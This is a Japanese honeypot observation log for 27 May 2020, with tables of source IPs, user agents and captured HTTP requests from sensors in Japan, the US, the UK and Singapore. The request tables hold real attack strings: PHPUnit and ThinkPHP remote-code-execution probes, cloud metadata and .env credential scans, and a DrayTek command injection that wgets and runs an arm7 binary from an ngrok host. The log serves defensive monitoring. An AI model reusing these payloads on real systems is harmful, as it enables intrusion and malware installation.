ハニーポット(仮) 観測記録 2020/05/27分です。
特徴
Location:JP
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Gh0stRATのような動き
を確認しました。
Location:UK
DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
を確認しました。
Location:SG
Huaweiルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:106 (前日比:+30)
US:総アクセス数:75 (前日比:+35)
UK:総アクセス数:83 (前日比:+40)
SG:総アクセス数:36 (前日比:0)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 5.101.0.209 | Russia |
1 | 5.188.206.50 | Russia |
2 | 35.228.184.196 | United States |
34 | 44.224.22.196 | United States |
1 | 45.56.76.224 | United States |
2 | 80.82.68.68 | Netherlands |
1 | 107.192.44.114 | United States |
57 | 185.234.218.42 | Ireland |
1 | 193.118.55.146 | Germany |
5 | 195.54.160.130 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
23 | - |
14 | AWS Security Scanner |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
57 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | ||
11 | \x16\x03\x01 | ||
10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /a/.env | HTTP/1.1 |
1 | GET | /admin-app/.env | HTTP/1.1 |
1 | GET | /admin/.env | HTTP/1.1 |
1 | GET | /adminer/adminer.php | HTTP/1.1 |
1 | GET | /api/.env | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /application/.env | HTTP/1.1 |
1 | GET | /apps/.env | HTTP/1.1 |
1 | GET | /auth/.env | HTTP/1.1 |
1 | GET | /back/.env | HTTP/1.1 |
1 | GET | /backend/.env | HTTP/1.1 |
1 | GET | /cli/.env | HTTP/1.1 |
1 | GET | /config/.env | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /cp/.env | HTTP/1.1 |
1 | GET | /cron/.env | HTTP/1.1 |
1 | GET | /dependencies/.env | HTTP/1.1 |
1 | GET | /deployment/.env | HTTP/1.1 |
1 | GET | /dev/.env | HTTP/1.1 |
1 | GET | /development/.env | HTTP/1.1 |
1 | GET | /docker/.env | HTTP/1.1 |
1 | GET | /document/.env | HTTP/1.1 |
1 | GET | /engine/.env | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /fedex/.env | HTTP/1.1 |
1 | GET | /framework/.env | HTTP/1.1 |
1 | GET | /frontend/.env | HTTP/1.1 |
1 | GET | /inc/.env | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /ironment/.env | HTTP/1.1 |
1 | GET | /laravel-artisan/.env | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | /local/.env | HTTP/1.1 |
1 | GET | /login.html | HTTP/1.1 |
1 | GET | /login/.env | HTTP/1.1 |
1 | GET | /m/.env | HTTP/1.1 |
1 | GET | /master/.env | HTTP/1.1 |
1 | GET | /mods/.env | HTTP/1.1 |
1 | GET | /personal/.env | HTTP/1.1 |
1 | GET | /private/.env | HTTP/1.1 |
1 | GET | /project/.env | HTTP/1.1 |
1 | GET | /protected/.env | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /react/.env | HTTP/1.1 |
1 | GET | /rest/.env | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /routes/.env | HTTP/1.1 |
1 | GET | /scripts/.env | HTTP/1.1 |
1 | GET | /search/.env | HTTP/1.1 |
1 | GET | /server/.env | HTTP/1.1 |
1 | GET | /shared/.env | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /site/.env | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /sources/.env | HTTP/1.1 |
1 | GET | /src/.env | HTTP/1.1 |
1 | GET | /system/.env | HTTP/1.1 |
1 | GET | /travis/.env | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /vod_installer/.env | HTTP/1.1 |
1 | GET | /vue/.env | HTTP/1.1 |
1 | GET | /web/.env | HTTP/1.1 |
1 | GET | /~dev/.env | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 35.224.147.214 | United States |
1 | 66.240.205.34 | United States |
2 | 80.82.68.59 | Netherlands |
1 | 128.14.209.226 | United States |
1 | 177.137.97.38 | Brazil |
1 | 185.202.2.67 | Netherlands |
57 | 185.234.218.174 | Ireland |
10 | 195.54.160.130 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
4 | - |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
57 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
1 | polaris botnet |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad | ||
1 | \x03 | ||
1 | \x16\x03\x01 | ||
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /a/.env | HTTP/1.1 |
1 | GET | /admin-app/.env | HTTP/1.1 |
1 | GET | /admin/.env | HTTP/1.1 |
1 | GET | /api/.env | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /application/.env | HTTP/1.1 |
1 | GET | /apps/.env | HTTP/1.1 |
1 | GET | /auth/.env | HTTP/1.1 |
1 | GET | /back/.env | HTTP/1.1 |
1 | GET | /backend/.env | HTTP/1.1 |
1 | GET | /cli/.env | HTTP/1.1 |
1 | GET | /config/.env | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /cp/.env | HTTP/1.1 |
1 | GET | /cron/.env | HTTP/1.1 |
1 | GET | /dependencies/.env | HTTP/1.1 |
1 | GET | /deployment/.env | HTTP/1.1 |
1 | GET | /dev/.env | HTTP/1.1 |
1 | GET | /development/.env | HTTP/1.1 |
1 | GET | /docker/.env | HTTP/1.1 |
1 | GET | /document/.env | HTTP/1.1 |
1 | GET | /engine/.env | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /fedex/.env | HTTP/1.1 |
1 | GET | /framework/.env | HTTP/1.1 |
1 | GET | /frontend/.env | HTTP/1.1 |
1 | GET | /inc/.env | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /ironment/.env | HTTP/1.1 |
1 | GET | /laravel-artisan/.env | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /local/.env | HTTP/1.1 |
1 | GET | /login.html | HTTP/1.1 |
1 | GET | /login/.env | HTTP/1.1 |
1 | GET | /m/.env | HTTP/1.1 |
1 | GET | /master/.env | HTTP/1.1 |
1 | GET | /mods/.env | HTTP/1.1 |
1 | GET | /personal/.env | HTTP/1.1 |
1 | GET | /private/.env | HTTP/1.1 |
1 | GET | /project/.env | HTTP/1.1 |
1 | GET | /protected/.env | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /react/.env | HTTP/1.1 |
1 | GET | /rest/.env | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /routes/.env | HTTP/1.1 |
1 | GET | /scripts/.env | HTTP/1.1 |
1 | GET | /search/.env | HTTP/1.1 |
1 | GET | /server/.env | HTTP/1.1 |
1 | GET | /shared/.env | HTTP/1.1 |
1 | GET | /site/.env | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /sources/.env | HTTP/1.1 |
1 | GET | /src/.env | HTTP/1.1 |
1 | GET | /system/.env | HTTP/1.1 |
1 | GET | /travis/.env | HTTP/1.1 |
1 | GET | /vod_installer/.env | HTTP/1.1 |
1 | GET | /vue/.env | HTTP/1.1 |
1 | GET | /web/.env | HTTP/1.1 |
1 | GET | /~dev/.env | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 5.101.0.209 | Russia |
2 | 35.228.8.49 | United States |
1 | 42.237.85.63 | China |
2 | 111.13.67.181 | China |
1 | 162.243.138.145 | United States |
1 | 179.49.60.210 | Ecuador |
1 | 181.164.53.47 | Argentina |
57 | 185.234.216.198 | Ireland |
1 | 193.118.55.146 | Germany |
13 | 195.54.160.130 | Russia |
1 | 197.232.1.182 | Kenya |
UserAgent一覧
件数 | UserAgent |
---|---|
3 | - |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
57 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01 | ||
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /a/.env | HTTP/1.1 |
1 | GET | /admin-app/.env | HTTP/1.1 |
1 | GET | /admin/.env | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
1 | GET | /api/.env | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /application/.env | HTTP/1.1 |
1 | GET | /apps/.env | HTTP/1.1 |
1 | GET | /auth/.env | HTTP/1.1 |
1 | GET | /back/.env | HTTP/1.1 |
1 | GET | /backend/.env | HTTP/1.1 |
1 | GET | /cli/.env | HTTP/1.1 |
1 | GET | /config/.env | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /cp/.env | HTTP/1.1 |
1 | GET | /cron/.env | HTTP/1.1 |
1 | GET | /dependencies/.env | HTTP/1.1 |
1 | GET | /deployment/.env | HTTP/1.1 |
1 | GET | /dev/.env | HTTP/1.1 |
1 | GET | /development/.env | HTTP/1.1 |
1 | GET | /docker/.env | HTTP/1.1 |
1 | GET | /document/.env | HTTP/1.1 |
1 | GET | /engine/.env | HTTP/1.1 |
1 | GET | /fedex/.env | HTTP/1.1 |
1 | GET | /framework/.env | HTTP/1.1 |
1 | GET | /frontend/.env | HTTP/1.1 |
1 | GET | /inc/.env | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /ironment/.env | HTTP/1.1 |
1 | GET | /laravel-artisan/.env | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /local/.env | HTTP/1.1 |
1 | GET | /login.html | HTTP/1.1 |
1 | GET | /login/.env | HTTP/1.1 |
1 | GET | /m/.env | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /master/.env | HTTP/1.1 |
1 | GET | /mods/.env | HTTP/1.1 |
1 | GET | /personal/.env | HTTP/1.1 |
1 | GET | /private/.env | HTTP/1.1 |
1 | GET | /project/.env | HTTP/1.1 |
1 | GET | /protected/.env | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /react/.env | HTTP/1.1 |
1 | GET | /rest/.env | HTTP/1.1 |
1 | GET | /routes/.env | HTTP/1.1 |
1 | GET | /scripts/.env | HTTP/1.1 |
1 | GET | /search/.env | HTTP/1.1 |
1 | GET | /server/.env | HTTP/1.1 |
1 | GET | /shared/.env | HTTP/1.1 |
1 | GET | /site/.env | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /sources/.env | HTTP/1.1 |
1 | GET | /src/.env | HTTP/1.1 |
1 | GET | /system/.env | HTTP/1.1 |
1 | GET | /travis/.env | HTTP/1.1 |
3 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /vod_installer/.env | HTTP/1.1 |
1 | GET | /vue/.env | HTTP/1.1 |
1 | GET | /web/.env | HTTP/1.1 |
1 | GET | /~dev/.env | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
3 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 5.62.49.25 | United States |
3 | 5.101.0.209 | Russia |
1 | 5.188.206.50 | Russia |
2 | 35.203.76.205 | United States |
2 | 80.82.68.72 | Netherlands |
1 | 101.81.98.184 | China |
2 | 111.229.86.22 | China |
1 | 128.14.209.234 | United States |
1 | 162.243.136.160 | United States |
2 | 163.172.213.11 | Netherlands |
1 | 193.42.99.162 | United States |
17 | 195.54.160.130 | Russia |
1 | 208.91.109.50 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
2 | Go-http-client/1.1 |
2 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | ||
1 | \x16\x03\x01 | ||
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /login.html | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /phpmyadmin | HTTP/1.1 |
1 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /t | HTTP/1.1 |
4 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//www[.]msftncsi[.]com/ncsi.txt | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
1 | OPTIONS | / | HTTP/1.0 |
4 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /ctrlt/DeviceUpgrade_1 | HTTP/1.1 |
4 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |